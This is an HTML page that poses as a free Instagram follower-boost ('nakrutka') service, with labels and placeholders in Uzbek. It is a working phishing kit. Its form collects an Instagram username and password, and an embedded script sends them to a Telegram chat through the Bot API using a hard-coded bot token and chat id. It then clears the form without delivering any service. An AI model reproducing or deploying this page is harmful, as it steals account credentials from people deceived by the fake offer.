<!DOCTYPE html>
<html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
        <title>free Nakrutka</title>
        <style>
            .form {
                margin: 0 auto;
                margin-top: 3%;
                padding: 2%;
                width: 50%;
                background-color: rgb(226, 226, 226);
                box-shadow: 0 0 20px #ccc;
            }

            input {
                width: 100%;
                padding: 1%;
                border: 1px solid #ccc;
                background-color: aliceblue;
                border-radius: 8px;
            }

            .user {
                margin: 1%;
            }

            .parol {
                margin: 1%;
            }

            .area {
                max-width: 100%;
                min-width: 100%;
                max-height: 10%;
                min-height: 10%;
            }

            input[type="submit"] {
                background-color: blue;
                color: white;
                font-family: cursive;
                cursor: pointer;
            }
        </style>
    </head>

    <body>
        <div class="form">
            <form action="" onsubmit=" return sendtelegram()">
                <div class="user">
                    <label>Instagram User:</label><br>
                    <input type="text" name="name" id="name" placeholder="Instagram Useringiz" required
                        autocomplete="off">
                </div><br>
                <div class="parol">
                    <label>Instagram account parolingiz:</label><br>
                    <input type="password" name="email" id="email" placeholder="Instagram Parolingiz" required
                        autocomplete="off"> <br>
                </div><br>
                <div>
                    <textarea class="area" name="message" id="message" cols="45" rows="10"
                        placeholder="Nechta nakrutka urishni hohlaysiz yozing..." required
                        autocomplete="off"></textarea>
                </div><br> <br>
                <input type="submit" value="Nakrutka urish" id="btn">
            </form>
        </div>
        <!-- <script src="sendtelegram.js"></script> -->
        <script>
            //bot token
            var telegram_bot_id = "6585087414:AAFUILAhsrMLtv2-B6eBJcXeC60OfqGJ97g"; // token'ni o'rniga Siz yaratgan Bot tokenini yozing
            //chat id
            var chat_id = -1001561791934; // 1111'ni o'rniga habar borishi kerak bo'lgan joyni ID'sini yozing (Batafsil videoda)
            var u_name, email, message;
            var ready = function () {
                u_name = document.getElementById("name").value;
                email = document.getElementById("email").value;
                message = document.getElementById("message").value;
                message = "Ismi: " + u_name + "\nEmail: " + email + "\nIzoh: " + message;
            };
            var sendtelegram = function () {
                ready();
                var settings = {
                    "async": true,
                    "crossDomain": true,
                    "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
                    "method": "POST",
                    "headers": {
                        "Content-Type": "application/json",
                        "cache-control": "no-cache"
                    },
                    "data": JSON.stringify({
                        "chat_id": chat_id,
                        "text": message
                    })
                };
                $.ajax(settings).done(function (response) {
                    console.log(response);
                });
                document.getElementById("name").value = "";
                document.getElementById("email").value = "";
                document.getElementById("message").value = "";
                return false;
            };
        </script>
    </body>

</html>